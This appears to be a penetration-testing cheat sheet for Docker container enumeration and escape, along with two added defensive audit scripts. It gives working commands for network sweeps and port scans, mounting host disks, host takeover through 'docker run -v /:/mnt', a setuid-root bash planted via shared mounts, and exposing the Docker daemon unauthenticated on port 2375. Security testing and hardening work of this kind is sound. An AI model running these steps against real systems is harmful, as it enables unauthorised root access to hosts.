Docker

Enumeration
  • Confirm the presence of .dockerenv

Check if running as root
cat /proc/self/status
Check SUID/SGID
find / -type f \( -perm -4000 -o -perm -2000 \)
Check processes
ps aux
Check the namespaces (each entry is a symlink whose inode identifies the namespace; if one matches the host's, that namespace is shared)
ls -l /proc/self/ns/

When the host's user information does not exist inside the container's /etc/passwd file, file listings (ls -l) show numeric UIDs/GIDs instead of human-readable names.

If the Docker socket is mounted inside the container, you may be able to drive the daemon with the docker CLI:

mount | grep docker.sock
ls -l /var/run/docker.sock
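
The checks above rolled into one triage report, as an added example that is not part of the original page. The report reads .dockerenv, the Uid and CapEff lines of /proc/self/status and the docker.sock permissions; the root directory argument and the make_fake_root fixture are assumptions added here so the logic can be exercised offline.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): collect the in-container
# checks into one report. ROOT defaults to /, but can point at a
# constructed directory tree so the logic runs offline.

container_report() {
    local root="${1:-/}" findings="" uid caps sock

    # Docker creates /.dockerenv in every container it starts.
    [ -e "$root/.dockerenv" ] && findings="$findings dockerenv"

    # Uid: line of /proc/self/status (real, effective, saved, fs uid).
    uid=$(awk '/^Uid:/ {print $2}' "$root/proc/self/status" 2>/dev/null)
    [ "$uid" = "0" ] && findings="$findings root"

    # Effective capability mask; CAP_SYS_ADMIN (bit 21) is what --privileged
    # or --cap-add SYS_ADMIN grants and what most escape techniques rely on.
    caps=$(awk '/^CapEff:/ {print $2}' "$root/proc/self/status" 2>/dev/null)
    if [ -n "$caps" ] && [ $(( 0x$caps & (1 << 21) )) -ne 0 ]; then
        findings="$findings cap-sys-admin"
    fi

    # A mounted Docker socket means the daemon, and so the host, is reachable.
    sock="$root/var/run/docker.sock"
    if [ -e "$sock" ]; then
        findings="$findings docker.sock"
        # 9th character of ls -l is the "other write" bit
        [ "$(ls -ld "$sock" | cut -c9)" = "w" ] && findings="$findings sock-world-writable"
    fi

    echo "${findings# }"
}

# Constructed fixture (not a real container): a fake root that trips every check.
make_fake_root() {
    local dir
    dir=$(mktemp -d)
    mkdir -p "$dir/proc/self" "$dir/var/run"
    : > "$dir/.dockerenv"
    printf 'Name:\tbash\nUid:\t0\t0\t0\t0\nCapEff:\t0000003fffffffff\n' > "$dir/proc/self/status"
    : > "$dir/var/run/docker.sock"
    chmod 666 "$dir/var/run/docker.sock"
    echo "$dir"
}

# Usage: container_report                      (inside a container)
#        container_report "$(make_fake_root)"  (offline demo)
```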

Understand the Network

Docker containers typically run in a private virtual network created by Docker; the default network uses a subnet in the 172.16.0.0/12 range.

Check the IPs
ip addr
Check the routing table
cat /proc/net/fib_trie
Always ping sweep the subnets
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
Scan ports
for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null
Use OpenSSL to scan ports
for host in 1 2 3 4; do for port in 21 22 25 80 443 8080; do (echo "172.19.0.$host:$port" && openssl s_client -connect 172.19.0.$host:$port 2>/dev/null | grep CONNECTED) & done; done; wait

Check for Mounted File Systems

cat /proc/mounts
mount | grep <directory>

Look for vulnerabilities and misconfiguration

cat /etc/docker/daemon.json
Loop to mount host disk partitions (only works when the container can see the host's block devices, e.g. when run with --privileged)
mkdir sda{1,2,3,4,5}
for number in 1 2 3 4 5; do mount /dev/sda$number sda$number; done
docker-cli
List running containers
docker ps
  • Check for containers running with elevated privileges (--privileged, --cap-add).

  • Look for containers that share host namespaces or file systems.

List Docker images
docker images

Look for containers running as root or with --privileged mode:

docker inspect <container_id> | grep -iE '"(Privileged|CapAdd|PidMode|NetworkMode|User)"'
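
A host-side audit for the settings the bullets above describe (privileged mode, added capabilities, shared host namespaces, sensitive bind mounts), as an added example that is not part of the original page. The --format template uses real docker inspect fields; audit_line and the sample lines in the test are assumptions added here so the logic runs without a Docker daemon.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): flag running containers whose
# configuration weakens the container boundary. docker inspect --format
# prints one line per container; audit_line turns such a line into findings.

FMT='{{.Name}}|{{.HostConfig.Privileged}}|{{.HostConfig.PidMode}}|{{.HostConfig.NetworkMode}}|{{.HostConfig.CapAdd}}|{{range .Mounts}}{{.Source}} {{end}}'

# Input: name|privileged|pidmode|netmode|capadd|mount sources (space separated)
# Output: "<name>:<space separated findings>" (empty findings = nothing flagged)
audit_line() {
    local name priv pid net caps mounts src findings=""
    IFS='|' read -r name priv pid net caps mounts <<EOF
$1
EOF
    [ "$priv" = "true" ] && findings="$findings privileged"
    [ "$pid" = "host" ] && findings="$findings host-pid"
    [ "$net" = "host" ] && findings="$findings host-net"
    # capabilities that hand over the host or let the container trace host processes
    case "$caps" in *SYS_ADMIN*|*SYS_PTRACE*|*ALL*) findings="$findings cap:$caps";; esac
    # bind mounts of the host root, the daemon socket or kernel/config trees
    for src in $mounts; do
        case "$src" in
            /|/var/run/docker.sock|/proc|/sys|/etc|/root) findings="$findings mount:$src";;
        esac
    done
    echo "${name#/}:${findings# }"
}

# Run against the local daemon; requires the docker CLI and socket access.
docker_audit() {
    docker ps -q | xargs -r docker inspect --format "$FMT" | while IFS= read -r line; do
        audit_line "$line"
    done
}
```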
Escape the container

Tools like nsenter or docker-exploit can be used to attempt escaping the container.

If the user is in the docker group, attempt to run the following command to mount the host filesystem and gain access to the host:

docker run -v /:/mnt -it bash bash

File Ownership Manipulation via Shared Mounts

  • Check permissions and ownership when you create a file from host and container:

touch from_host
touch from_container
  • If the container is misconfigured so that it can create files as root, and you can access from the container the files created by the host:

    1. From the host, copy bash in to the mounted directory.

    2. From the container, change the ownership and permissions of bash to root.

    3. Execute bash as root.

cp /bin/bash .
chown root:root bash; chmod 4777 bash
./bash -p
Configure Docker to listen on a TCP port
  1. Open the Docker service file, typically at /lib/systemd/system/docker.service or /etc/systemd/system/docker.service.

  2. Change ExecStart to bind a TCP address:

ExecStart=/usr/bin/dockerd --host=tcp://0.0.0.0:2375
  3. Reload the daemon and restart Docker if needed:

systemctl daemon-reload
systemctl restart docker
  4. Connect to it using docker-cli:

export DOCKER_HOST=tcp://<host_ip>:2375
docker ps